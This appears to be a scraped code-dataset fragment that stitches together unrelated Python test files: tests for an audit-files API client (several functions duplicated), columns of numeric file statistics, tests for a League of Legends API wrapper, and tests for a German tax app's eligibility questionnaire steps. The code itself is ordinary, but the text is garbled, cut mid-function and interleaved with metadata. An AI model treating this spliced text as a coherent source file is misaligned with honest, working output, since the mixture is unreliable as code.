check(audit_file['owner'], 'firstname', str)
check(audit_file['owner'], 'lastname', str)
check(audit_file, 'ownerGroup', dict)
check(audit_file['ownerGroup'], 'id', str)
check(audit_file['ownerGroup'], 'name', str)
check(audit_file['ownerGroup'], 'description', str)
check(audit_file, 'status', str)
check(audit_file, 'targetGroup', dict)
check(audit_file['targetGroup'], 'id', int)
check(audit_file['targetGroup'], 'name', str)
check(audit_file['targetGroup'], 'description', str)
check(audit_file, 'type', str)
check(audit_file, 'typeFields', dict)
check(audit_file['typeFields'], 'variables', list)
for variable in audit_file['typeFields']['variables']:
check(variable, 'name', str)
check(variable, 'value', str)
check(audit_file, 'version', str)
@pytest.mark.vcr()
def test_audit_files_list_success(sc):
a_files = sc.audit_files.list()
assert isinstance(a_files, dict)
for file_type in ['usable', 'manageable']:
for type in a_files[file_type]:
check(type, 'name', str)
check(type, 'description', str)
check(type, 'type', str)
check(type, 'status', str)
check(type, 'id', str)
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
assert isinstance(audit_files, dict)
for c in ['usable', 'manageable']:
for a in audit_files[c]:
check(a, 'name', str)
check(a, 'description', str)
check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
with open('1000007.xml', 'wb') as file:
sc.audit_files.export_audit(1000007, fobj=file)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
with open('1000007.xml', 'wb'):
sc.audit_files.export_audit(1000007)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
template = sc.audit_files.template_details(1,
fields=['id', 'name', 'categoryName', 'categoryId'])
assert isinstance(template, dict)
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
templates = sc.audit_files.template_list(fields=['id', 'name', 'categoryName', 'categoryId'],
category=1,
search='categoryName:Unix')
assert isinstance(templates, list)
for template in templates:
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
categories = sc.audit_files.template_categories()
assert isinstance(categories, list)
for category in categories:
check(category, 'categoryName', str)
check(category, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
assert isinstance(audit_files, dict)
for c in ['usable', 'manageable']:
for a in audit_files[c]:
check(a, 'name', str)
check(a, 'description', str)
check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
with open('1000007.xml', 'wb') as file:
sc.audit_files.export_audit(1000007, fobj=file)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
with open('1000007.xml', 'wb'):
sc.audit_files.export_audit(1000007)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
template = sc.audit_files.template_details(1,
fields=['id', 'name', 'categoryName', 'categoryId'])
assert isinstance(template, dict)
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
templates = sc.audit_files.template_list(fields=['id', 'name', 'categoryName', 'categoryId'],
category=1,
search='categoryName:Unix')
assert isinstance(templates, list)
for template in templates:
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
categories = sc.audit_files.template_categories()
assert isinstance(categories, list)
for category in categories:
check(category, 'categoryName', str)
check(category, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_list_success_for_fields(sc):
audit_files = sc.audit_files.list(fields=('id', 'name', 'description'))
assert isinstance(audit_files, dict)
for c in ['usable', 'manageable']:
for a in audit_files[c]:
check(a, 'name', str)
check(a, 'description', str)
check(a, 'id', str)
@pytest.mark.vcr()
def test_audit_files_export_audit(sc):
with open('1000007.xml', 'wb') as file:
sc.audit_files.export_audit(1000007, fobj=file)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_export_audit_no_file(sc):
with open('1000007.xml', 'wb'):
sc.audit_files.export_audit(1000007)
os.remove('1000007.xml')
@pytest.mark.vcr()
def test_audit_files_template_details_success(sc):
template = sc.audit_files.template_details(1,
fields=['id', 'name', 'categoryName', 'categoryId'])
assert isinstance(template, dict)
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_list_success(sc):
templates = sc.audit_files.template_list(fields=['id', 'name', 'categoryName', 'categoryId'],
category=1,
search='categoryName:Unix')
assert isinstance(templates, list)
for template in templates:
check(template, 'id', str)
check(template, 'name', str)
check(template, 'categoryName', str)
check(template, 'categoryId', str)
@pytest.mark.vcr()
def test_audit_files_template_categories(sc):
categories = sc.audit_files.template_categories()
assert isinstance(categories, list)
for category in categories:
check(category, 'categoryName', str)
check(category, 'categoryId', str)
| 36.299228
| 100
| 0.653566
| 2,259
| 18,803
| 5.213811
| 0.062417
| 0.116149
| 0.146205
| 0.13712
| 0.898625
| 0.871795
| 0.863474
| 0.822551
| 0.802258
| 0.795551
| 0
| 0.013757
| 0.207467
| 18,803
| 517
| 101
| 36.369439
| 0.776607
| 0
| 0
| 0.736597
| 0
| 0
| 0.171781
| 0.011222
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.102564
| false
| 0
| 0.011655
| 0
| 0.11655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
049f72425e50d469aed857ba2155ea2bcd0d4188
| 4,385
|
py
|
Python
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 52
|
2018-04-24T15:30:02.000Z
|
2022-02-22T11:05:27.000Z
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 8
|
2020-09-18T04:00:21.000Z
|
2022-03-22T00:01:20.000Z
|
test/test_league.py
|
dp0973/pantheon
|
89ac57717ed3cf6532986069b6c94228be273b8b
|
[
"MIT"
] | 14
|
2019-01-03T13:09:36.000Z
|
2022-03-05T17:13:45.000Z
|
from .config import *
def test_leagueId():
try:
data = loop.run_until_complete(panth.getLeagueById(leagueId))
except Exception as e:
print(e)
assert data["leagueId"] == leagueId
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_challenger():
try:
data = loop.run_until_complete(panth.getChallengerLeague())
except Exception as e:
print(e)
assert data["tier"] == "CHALLENGER"
assert data["queue"] == "RANKED_SOLO_5x5"
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_challenger_flex():
try:
data = loop.run_until_complete(panth.getChallengerLeague("RANKED_FLEX_SR"))
except Exception as e:
print(e)
assert data["tier"] == "CHALLENGER"
assert data["queue"] == "RANKED_FLEX_SR"
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_grandmaster():
try:
data = loop.run_until_complete(panth.getGrandmasterLeague())
except Exception as e:
print(e)
assert data["tier"] == "GRANDMASTER"
assert data["queue"] == "RANKED_SOLO_5x5"
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_grandmaster_flex():
try:
data = loop.run_until_complete(panth.getGrandmasterLeague("RANKED_FLEX_SR"))
except Exception as e:
print(e)
assert data["tier"] == "GRANDMASTER"
assert data["queue"] == "RANKED_FLEX_SR"
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_master():
try:
data = loop.run_until_complete(panth.getMasterLeague())
except Exception as e:
print(e)
assert data["tier"] == "MASTER"
assert data["queue"] == "RANKED_SOLO_5x5"
assert type(data["entries"]) == list
@pytest.mark.skipif(too_early, reason="Too early in the season")
def test_apex_master_flex():
try:
data = loop.run_until_complete(panth.getMasterLeague("RANKED_FLEX_SR"))
except Exception as e:
print(e)
assert data["tier"] == "MASTER"
assert data["queue"] == "RANKED_FLEX_SR"
assert type(data["entries"]) == list
def test_league_entries_by_summonerId():
try:
data = loop.run_until_complete(panth.getLeaguePosition(summonerId))
except Exception as e:
print(e)
assert type(data) == list
def test_league_entries():
try:
data = loop.run_until_complete(panth.getLeaguePages())
except Exception as e:
print(e)
assert type(data) == list
if len(data) > 0:
entry = data[0]
assert entry["queueType"] == "RANKED_SOLO_5x5"
assert entry["tier"] == "DIAMOND"
assert entry["rank"] == "I"
else:
pytest.skip("not enough player at this rank")
def test_league_entries_params():
try:
data = loop.run_until_complete(panth.getLeaguePages(queue="RANKED_FLEX_SR", tier="SILVER", division="III"))
except Exception as e:
print(e)
assert type(data) == list
if len(data) > 0:
entry = data[0]
assert entry["queueType"] == "RANKED_FLEX_SR"
assert entry["tier"] == "SILVER"
assert entry["rank"] == "III"
else:
pytest.skip("not enough player at this rank")
def test_league_entries_pages():
try:
data = loop.run_until_complete(panth.getLeaguePages(queue="RANKED_FLEX_SR", tier="SILVER", division="III", page=1))
except Exception as e:
print(e)
try:
data_2 = loop.run_until_complete(panth.getLeaguePages(queue="RANKED_FLEX_SR", tier="SILVER", division="III", page=2))
except Exception as e:
print(e)
assert type(data) == list
if len(data) > 0 and len(data_2) > 0:
entry = data[0]
assert entry["queueType"] == "RANKED_FLEX_SR"
assert entry["tier"] == "SILVER"
assert entry["rank"] == "III"
entry_2 = data_2[0]
assert not entry == entry_2
else:
pytest.skip("not enough player at this rank")
| 27.753165
| 125
| 0.61756
| 547
| 4,385
| 4.780622
| 0.137112
| 0.049713
| 0.055067
| 0.091778
| 0.9174
| 0.902103
| 0.892925
| 0.868451
| 0.718547
| 0.703633
| 0
| 0.007044
| 0.255416
| 4,385
| 157
| 126
| 27.929936
| 0.793874
| 0
| 0
| 0.725664
| 0
| 0
| 0.162255
| 0
| 0
| 0
| 0
| 0
| 0.300885
| 1
| 0.097345
| false
| 0
| 0.00885
| 0
| 0.106195
| 0.106195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04a8004ca309a9d2180cf2f8d455c62965028f04
| 209,353
|
py
|
Python
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 20
|
2021-07-02T07:49:08.000Z
|
2022-03-18T22:26:10.000Z
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 555
|
2021-06-28T15:35:15.000Z
|
2022-03-31T11:51:55.000Z
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 1
|
2021-07-04T20:34:12.000Z
|
2021-07-04T20:34:12.000Z
|
import unittest
from unittest.mock import patch, MagicMock
import pytest
from flask.sessions import SecureCookieSession
from flask_babel import ngettext, _
from pydantic import ValidationError
from werkzeug.datastructures import ImmutableMultiDict
from werkzeug.exceptions import NotFound
from app.forms.flows.eligibility_step_chooser import EligibilityStepChooser, _ELIGIBILITY_DATA_KEY
from app.forms.session_data import deserialize_session_data
from app.forms.steps.eligibility_steps import MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep, \
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep, \
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep, IncorrectEligibilityData, \
UserAElsterAccountEligibilityInputFormSteuerlotseStep, MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep, \
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep, PensionDecisionEligibilityInputFormSteuerlotseStep, \
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep, \
DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep, \
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep, SingleAlimonyEligibilityFailureDisplaySteuerlotseStep, \
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep, PensionEligibilityFailureDisplaySteuerlotseStep, \
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, EmploymentDecisionEligibilityInputFormSteuerlotseStep, \
TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep, \
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep, CheaperCheckEligibilityFailureDisplaySteuerlotseStep, \
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep, \
MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep, \
IncomeOtherEligibilityFailureDisplaySteuerlotseStep, ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep, \
ForeignCountriesEligibilityFailureDisplaySteuerlotseStep, EligibilitySuccessDisplaySteuerlotseStep, \
SeparatedEligibilityInputFormSteuerlotseStep, MaritalStatusInputFormSteuerlotseStep, \
EligibilityStepMixin, SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep, \
EligibilityStartDisplaySteuerlotseStep, SeparatedJointTaxesEligibilityInputFormSteuerlotseStep, \
EligibilityMaybeDisplaySteuerlotseStep, \
data_fits_data_model_from_list, data_fits_data_model
from app.forms.steps.steuerlotse_step import RedirectSteuerlotseStep
from app.model.recursive_data import PreviousFieldsMissingError
from tests.forms.mock_steuerlotse_steps import MockRenderStep, MockStartStep, MockFormStep, MockFinalStep, \
MockDecisionEligibilityInputFormSteuerlotseStep
from tests.utils import create_session_form_data
FULL_SESSION_DATA = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no',
'foreign_country_eligibility': 'no'}
class TestEligibilityStepChooser(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def setUp(self):
testing_steps = [MockStartStep, MockRenderStep, MockFormStep, MockFinalStep]
testing_steps_dict = {s.name: s for s in testing_steps}
self.endpoint_correct = "eligibility"
self.step_chooser = EligibilityStepChooser(endpoint=self.endpoint_correct)
self.step_chooser.steps = testing_steps_dict
self.step_chooser.step_order = [s.name for s in testing_steps]
self.step_chooser.first_step = next(iter(testing_steps_dict.values()))
self.stored_data = self.step_chooser.default_data()
# Set sessions up
self.existing_session = "sessionAvailable"
self.session_data = {'renten': 'yes', 'pensionen': 'yes', 'geringf': 'yes',
'kapitaleink': 'yes', 'other': 'no'}
def test_if_correct_step_name_then_return_correct_step(self):
response_step = self.step_chooser.get_correct_step(MockRenderStep.name, False, ImmutableMultiDict({}))
self.assertIsInstance(response_step, MockRenderStep)
def test_if_incorrect_step_name_then_raise_404_exception(self):
self.assertRaises(NotFound, self.step_chooser.get_correct_step, "Incorrect Step Name", False, ImmutableMultiDict({}))
def test_if_start_step_then_return_redirect_step(self):
self.step_chooser.default_data = lambda: None
response_step = self.step_chooser.get_correct_step("start", False, ImmutableMultiDict({}))
self.assertIsInstance(response_step, RedirectSteuerlotseStep)
self.assertEqual(response_step.redirection_step_name, MockStartStep.name)
self.assertEqual(response_step.endpoint, self.endpoint_correct)
class TestEligibilityStepSpecificsMixin(unittest.TestCase):
def test_if_married_and_joint_taxes_false_then_return_2(self):
input_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes', }
num_of_users = EligibilityStepMixin().number_of_users(input_data)
self.assertEqual(2, num_of_users)
def test_if_married_and_joint_taxes_true_then_return_2(self):
input_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes', }
num_of_users = EligibilityStepMixin().number_of_users(input_data)
self.assertEqual(2, num_of_users)
def test_if_data_incorrect_then_return_1(self):
input_data = {'marital_status_eligibility': 'widowed'}
num_of_users = EligibilityStepMixin().number_of_users(input_data)
self.assertEqual(1, num_of_users)
class TestDataFitsDataModel:
def test_if_model_fails_then_return_false(self):
failing_model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))
result = data_fits_data_model(failing_model, {})
assert result is False
def test_if_model_does_not_fail_then_return_true(self):
succeeding_model = MagicMock()
result = data_fits_data_model(succeeding_model, {})
assert result is True
class TestDataFitsOneDataModel:
def test_if_all_models_fail_then_return_false(self):
failing_model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))
models = [failing_model, failing_model, failing_model]
result = data_fits_data_model_from_list(models, {})
assert result is False
def test_if_one_model_does_not_fail_then_return_true(self):
failing_model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))
succeeding_model = MagicMock()
models = [failing_model, succeeding_model, failing_model]
result = data_fits_data_model_from_list(models, {})
assert result is True
def test_if_all_models_does_not_fail_then_return_true(self):
succeeding_model = MagicMock()
models = [succeeding_model, succeeding_model, succeeding_model]
result = data_fits_data_model_from_list(models, {})
assert result is True
class TestEligibilityInputFormSteuerlotseStepIsPreviousStep(unittest.TestCase):
def setUp(self):
self.step = MockDecisionEligibilityInputFormSteuerlotseStep
self.valid_data_model = MagicMock(parse_obj=MagicMock(return_value=None))
self.invalid_data_model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))
def test_if_one_model_and_data_valid_for_model_then_return_true(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_model')]
return_value = self.step.is_previous_step('next_step_model', {})
self.assertTrue(return_value)
def test_if_one_model_and_data_invalid_for_model_then_return_false(self):
self.step.next_step_data_models = [(self.invalid_data_model, 'next_step_model')]
return_value = self.step.is_previous_step('next_step_model', {})
self.assertFalse(return_value)
def test_if_multiple_models_and_data_valid_for_one_model_then_return_true(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_model_1'),
(self.invalid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_1', {})
self.assertTrue(return_value)
self.step.next_step_data_models = [(self.invalid_data_model, 'next_step_model_1'),
(self.valid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_2', {})
self.assertTrue(return_value)
def test_if_multiple_models_and_data_valid_for_both_models_then_return_true_for_first_model(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_model_1'),
(self.valid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_1', {})
self.assertTrue(return_value)
def test_if_multiple_models_and_data_valid_for_both_models_then_return_true_for_second_model(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_model_1'),
(self.valid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_2', {})
self.assertTrue(return_value)
def test_if_multiple_models_and_data_invalid_for_both_models_then_return_false(self):
self.step.next_step_data_models = [(self.invalid_data_model, 'next_step_model_1'),
(self.invalid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_1', {})
self.assertFalse(return_value)
def test_if_multiple_models_and_data_valid_for_both_models_but_next_step_not_matching_then_return_false(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_model_1'),
(self.valid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('next_step_model_3', {})
self.assertFalse(return_value)
def test_if_given_step_name_is_not_in_next_step_list_then_return_false(self):
self.step.next_step_data_models = [(self.valid_data_model, 'next_step_1'),
(self.invalid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('DIFFERENT_STEP', {})
self.assertFalse(return_value)
def test_if_matching_model_is_not_given_next_step_name_then_return_false(self):
self.step.next_step_data_models = [(self.valid_data_model, 'not_actual_next_step'),
(self.invalid_data_model, 'next_step_model_2')]
return_value = self.step.is_previous_step('actual_next_step', {})
self.assertFalse(return_value)
class TestEligibilityStartDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def test_sets_correct_session_data_to_empty_dict(self):
session_data = {
_ELIGIBILITY_DATA_KEY: create_session_form_data({'marital_status_eligibility': 'single'})
}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(session_data)
step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual({}, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_does_not_change_other_session_data(self):
other_session_key = 'OTHER_SESSION_KEY'
other_session_data = {'Galileo': 'Figaro - magnificoo'}
another_session_key = 'ANOTHER_SESSION_KEY'
another_session_data = {'Scaramouch': 'Fandango'}
session_data = {
_ELIGIBILITY_DATA_KEY: create_session_form_data({'marital_status_eligibility': 'single'}),
other_session_key: create_session_form_data(other_session_data),
another_session_key: create_session_form_data(another_session_data)
}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(session_data)
step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(other_session_data, deserialize_session_data(req.session[other_session_key]))
self.assertEqual(another_session_data, deserialize_session_data(req.session[another_session_key]))
def test_does_not_add_data_to_empty_session_data(self):
session_data = {}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(session_data)
step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual({}, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_leaves_session_data_without_correct_key_untouched(self):
other_session_key = 'OTHER_SESSION_KEY'
other_session_data = {'Galileo': 'Figaro - magnificoo'}
session_data = {
other_session_key: create_session_form_data(other_session_data)
}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(session_data)
step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(other_session_data, deserialize_session_data(req.session[other_session_key]))
@pytest.mark.usefixtures("test_request_context")
class TestMaritalStatusInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def test_if_post_and_married_then_set_next_step_correct(self):
with self.app.test_request_context(method='POST'):
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name,
True, form_data=ImmutableMultiDict(
{'marital_status_eligibility': 'married'}))
expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_widowed_then_set_next_step_correct(self):
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict(
{'marital_status_eligibility': 'widowed'}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_single_then_set_next_step_correct(self):
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict(
{'marital_status_eligibility': 'single'}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_divorced_then_set_next_step_correct(self):
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict(
{'marital_status_eligibility': 'divorced'}))
expected_url = step.url_for_step(DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET'):
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name,
False, ImmutableMultiDict({}))
expected_url = step.url_for_step(EligibilityStartDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(MaritalStatusInputFormSteuerlotseStep.name,
False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'yes'}))
expected_url = step.url_for_step(SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'no'}))
expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
